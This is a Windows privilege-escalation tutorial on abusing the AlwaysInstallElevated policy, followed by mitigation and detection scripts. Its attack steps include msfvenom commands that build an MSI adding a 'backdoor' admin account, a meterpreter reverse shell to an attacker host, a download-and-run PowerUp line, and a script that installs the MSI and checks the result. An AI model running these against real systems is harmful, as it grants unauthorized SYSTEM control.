EoP - AlwaysInstallElevated

Exploiting AlwaysInstallElevated Policy: A Guide

Key Concept: AlwaysInstallElevated Policy

The AlwaysInstallElevated policy tells the Windows Installer service to run every MSI installation with elevated privileges, regardless of who starts it. The policy lives under Software\Policies\Microsoft\Windows\Installer in both HKLM and HKCU; it only takes effect when the AlwaysInstallElevated value is set to 1 in both hives. Because the Windows Installer service runs as LocalSystem, a standard user can then install an arbitrary MSI whose custom actions execute as NT AUTHORITY\SYSTEM, for example to create a local administrator or launch a payload.


Step 1: Checking Registry Values

1.1 User Registry Key

Check if the user-level AlwaysInstallElevated setting is enabled:

Command Prompt/PowerShell:

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

Expected Output:

AlwaysInstallElevated    REG_DWORD    0x1

1.2 Machine Registry Key

Check if the machine-wide AlwaysInstallElevated setting is enabled:

reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

PowerShell Alternative:

Get-ItemProperty HKLM:\Software\Policies\Microsoft\Windows\Installer -Name AlwaysInstallElevated -ErrorAction SilentlyContinue
Get-ItemProperty HKCU:\Software\Policies\Microsoft\Windows\Installer -Name AlwaysInstallElevated -ErrorAction SilentlyContinue

Note: Both values must be 1 for exploitation. If reg query reports that the key or value cannot be found, or the value is 0, the policy is not in effect for that hive and the technique will not work. The HKCU value is per user, so run the check as the account you intend to escalate from, not from an administrator's shell.
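As an added example (not code from the original page, PowerUp or Metasploit), the following PowerShell function performs both checks from a single low-privilege session, treats a missing key or value as "not set", and only reports the host as exploitable when both hives are 1. The function and output field names are my own; it also reports whether the current user is already an administrator, since in that case the policy gives no escalation.

```powershell
# Added example: check both AlwaysInstallElevated values and give a verdict.
# Function name and output fields are assumptions of this example.
function Test-AlwaysInstallElevated {
    [CmdletBinding()]
    param()

    $subKey = 'Software\Policies\Microsoft\Windows\Installer'
    $state  = @{}

    foreach ($hive in 'HKLM', 'HKCU') {
        $path  = "${hive}:\$subKey"
        $value = $null
        # A missing key or value means the policy is not set for that hive,
        # which Windows Installer treats the same as 0.
        if (Test-Path -LiteralPath $path) {
            $item = Get-ItemProperty -LiteralPath $path -Name 'AlwaysInstallElevated' -ErrorAction SilentlyContinue
            if ($null -ne $item) { $value = [int]$item.AlwaysInstallElevated }
        }
        $state[$hive] = $value
    }

    # The service only honours the policy when BOTH hives say 1.
    $exploitable = ($state['HKLM'] -eq 1) -and ($state['HKCU'] -eq 1)

    $identity  = [Security.Principal.WindowsIdentity]::GetCurrent()
    $principal = New-Object Security.Principal.WindowsPrincipal($identity)
    $isAdmin   = $principal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)

    [pscustomobject]@{
        CurrentUser    = $identity.Name
        AlreadyAdmin   = $isAdmin
        HKLM           = if ($null -eq $state['HKLM']) { 'not set' } else { $state['HKLM'] }
        HKCU           = if ($null -eq $state['HKCU']) { 'not set' } else { $state['HKCU'] }
        Exploitable    = $exploitable -and -not $isAdmin
    }
}

Test-AlwaysInstallElevated | Format-List
```

Run it from the standard user's shell; an Exploitable value of True means Step 2 onward will execute as SYSTEM.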


Step 2: Creating the MSI Package

Using msfvenom to Create a Malicious MSI

Generate an MSI package that creates a local user and adds it to the Administrators group (that is what the windows/adduser payload does by default). The password must satisfy the target's password policy or the account creation will fail silently:

Command:

msfvenom -p windows/adduser USER=backdoor PASS=backdoor123 -f msi -o evil.msi

Suppressing UAC Prompts:

msfvenom has no -nouac option; the UAC-free variant is a separate output format, msi-nouac, which builds the package so that launching it does not trigger a UAC consent dialog:

msfvenom -p windows/adduser USER=backdoor PASS=backdoor123 -f msi-nouac -o evil.msi

Custom Payloads

You can replace the payload with any desired functionality, such as a reverse shell (for example windows/x64/shell_reverse_tcp with LHOST and LPORT set); whatever runs will do so as NT AUTHORITY\SYSTEM.


Step 3: Installing the MSI Package

Once the MSI package is on the target, install it quietly without user interaction (/qn already means "no UI"; /quiet is redundant but harmless):

Command:

msiexec /quiet /qn /i C:\path\to\evil.msi

Note: the msfvenom MSI template runs the payload as a custom action and then deliberately fails the installation so that no product is registered. msiexec therefore reports an installation failure (exit code 1603) even though the payload has already executed; verify the effect (new user, callback) rather than trusting the exit code.
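To tie Steps 2 and 3 together, here is an added PowerShell wrapper (not from the original page or from Metasploit) that runs the generated MSI with a verbose log, explains the expected 1603 result, and confirms the outcome by checking the local Administrators group. The MSI path and the account name are assumptions and must match what was passed to msfvenom.

```powershell
# Added example: install the msfvenom MSI and verify the side effect.
# $MsiPath and $UserName are assumptions; adjust to your msfvenom command.
param(
    [string]$MsiPath  = 'C:\Users\Public\evil.msi',
    [string]$UserName = 'backdoor'
)

if (-not (Test-Path -LiteralPath $MsiPath)) {
    throw "MSI not found: $MsiPath"
}

# /qn = no UI. /l*v writes a verbose log so the custom action is visible
# even though the installer itself is expected to end in failure.
$log  = Join-Path $env:TEMP 'evil-install.log'
$proc = Start-Process -FilePath 'msiexec.exe' `
    -ArgumentList @('/i', "`"$MsiPath`"", '/qn', '/l*v', "`"$log`"") `
    -Wait -PassThru

# The msfvenom template runs the payload, then fails the install on purpose
# so nothing is registered under Programs and Features. 1603 is the normal
# result here, not evidence that the payload did not run.
"msiexec exit code: $($proc.ExitCode) (0 = success, 1603 = expected failure after the payload ran)"

# Verify the effect instead of trusting the exit code. 'net localgroup'
# prints one member per line, so match the whole line against the name.
$members = net localgroup Administrators 2>$null
if ($members -match "^\s*$([regex]::Escape($UserName))\s*$") {
    "SUCCESS: $UserName is a member of the local Administrators group"
} else {
    "NOT FOUND: $UserName is not in Administrators; inspect $log for the custom action"
}
```

If the account is missing, the verbose log usually shows why: a password-policy rejection inside the custom action, or the policy not actually being honoured because one of the two registry values was not 1.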

Step 4: Automating with Metasploit or PowerUp

4.1 Metasploit

Metasploit provides a local exploit module for this technique. It needs an existing session on the target as the low-privilege user, checks both registry values itself, then drops and installs an MSI carrying the chosen payload:

Command:

use exploit/windows/local/always_install_elevated
set SESSION <session_id>
set payload windows/meterpreter/reverse_tcp
set LHOST <attacker_ip>
set LPORT <attacker_port>
exploit

4.2 PowerUp Script

PowerUp, a PowerShell privilege-escalation audit script, can automate checking and exploiting this misconfiguration. The PowerTools repository referenced below is archived; the maintained copy of PowerUp lives in PowerSploit's Privesc folder, and the older PowerTools copy names the check Get-RegAlwaysInstallElevated rather than Get-RegistryAlwaysInstallElevated. Invoke-AllChecks runs this check alongside the other PowerUp checks.

Check AlwaysInstallElevated Settings:

IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1')
Get-RegistryAlwaysInstallElevated

Generate and Install MSI Package via PowerUp:

Write-UserAddMSI takes only a -Path parameter (default UserAdd.msi in the current directory); the username and password are not command-line arguments. It writes a precompiled MSI that, when run, opens a small form prompting for the account name, password and group to add, so this variant is interactive rather than silent:

Write-UserAddMSI -Path C:\Users\Public\UserAdd.msi
msiexec /i C:\Users\Public\UserAdd.msi

Security Implications

Impact of Exploitation

  • Privilege Escalation: Allows any interactive user to run arbitrary MSI custom actions as NT AUTHORITY\SYSTEM, which is a full local compromise.

  • Persistence: Attackers can create privileged accounts or install backdoors.


Mitigation Strategies

1. Disable AlwaysInstallElevated

Ensure the value is 0 or absent in both hives. Locally, the values can be deleted:

reg delete HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated /f
reg delete HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated /f

These keys are normally written by Group Policy, so a local deletion is undone at the next policy refresh if a GPO still enables the setting. The durable fix is to set "Always install with elevated privileges" (Administrative Templates > Windows Components > Windows Installer) to Disabled under both Computer Configuration and User Configuration.

2. Least Privilege

Restrict user permissions to prevent unauthorized installation of software.

3. Audit and Monitor

Regularly audit the two registry values across the fleet and monitor MSI installation activity: MsiInstaller events in the Application log (1040/1042 transaction begin and end, 1033 install result, including failed installs) and, in the Security log, 4720 (user account created) and 4732 (member added to a security-enabled local group) occurring shortly after an install initiated by a non-administrative user.
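The following is an added defender-side script (not from the original page) covering mitigation 1 and mitigation 3 together: it reports the current policy values, offers a function that explicitly sets both values to 0, and pulls the Windows Installer and account-management events from the last 24 hours into one timeline. The function names and the 24-hour window are my own choices; reading the Security log requires an elevated shell and account-management auditing to be enabled.

```powershell
# Added example: audit, remediate and detect AlwaysInstallElevated abuse.
# Function names and the time window are assumptions of this example.

function Get-AlwaysInstallElevatedPolicy {
    foreach ($hive in 'HKLM', 'HKCU') {
        $path = "${hive}:\Software\Policies\Microsoft\Windows\Installer"
        $v = (Get-ItemProperty -LiteralPath $path -Name AlwaysInstallElevated -ErrorAction SilentlyContinue).AlwaysInstallElevated
        [pscustomobject]@{ Hive = $hive; AlwaysInstallElevated = if ($null -eq $v) { 'not set' } else { $v } }
    }
}

function Disable-AlwaysInstallElevated {
    # Set 0 explicitly rather than deleting, so the decision is visible in the
    # registry. A GPO that sets 1 will still win at the next refresh; fix the GPO.
    foreach ($hive in 'HKLM', 'HKCU') {
        $path = "${hive}:\Software\Policies\Microsoft\Windows\Installer"
        if (-not (Test-Path -LiteralPath $path)) { New-Item -Path $path -Force | Out-Null }
        Set-ItemProperty -LiteralPath $path -Name AlwaysInstallElevated -Value 0 -Type DWord
    }
}

function Get-SuspiciousInstallerActivity {
    param([int]$Hours = 24)
    $since = (Get-Date).AddHours(-$Hours)

    # MsiInstaller: 1040/1042 = transaction begin/end, 1033 = install result
    # (failed msfvenom installs still produce these).
    $msi = Get-WinEvent -FilterHashtable @{
        LogName = 'Application'; ProviderName = 'MsiInstaller'; Id = 1033, 1040, 1042; StartTime = $since
    } -ErrorAction SilentlyContinue

    # Security: 4720 = user account created, 4732 = member added to a
    # security-enabled local group (e.g. Administrators).
    $sec = Get-WinEvent -FilterHashtable @{
        LogName = 'Security'; Id = 4720, 4732; StartTime = $since
    } -ErrorAction SilentlyContinue

    $events = @()
    if ($msi) { $events += $msi }
    if ($sec) { $events += $sec }

    $events | Sort-Object TimeCreated | ForEach-Object {
        # UserId (when present) attributes the event to the initiating account.
        $user = ''
        if ($_.UserId) {
            try   { $user = $_.UserId.Translate([Security.Principal.NTAccount]).Value }
            catch { $user = $_.UserId.Value }
        }
        [pscustomobject]@{
            Time    = $_.TimeCreated
            Log     = $_.LogName
            Id      = $_.Id
            User    = $user
            Message = ($_.Message -split "`r?`n")[0]
        }
    }
}

Get-AlwaysInstallElevatedPolicy
Get-SuspiciousInstallerActivity -Hours 24 | Format-Table -AutoSize
# After confirming the policy is not required: Disable-AlwaysInstallElevated
```

A 1040 from a non-administrative user followed within seconds by a 4720 and a 4732 naming Administrators is the pattern this technique leaves behind; the verbose msiexec log, if the attacker wrote one, will name the custom action.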


This guide outlines steps to exploit and mitigate the AlwaysInstallElevated misconfiguration. Always adhere to legal and ethical guidelines.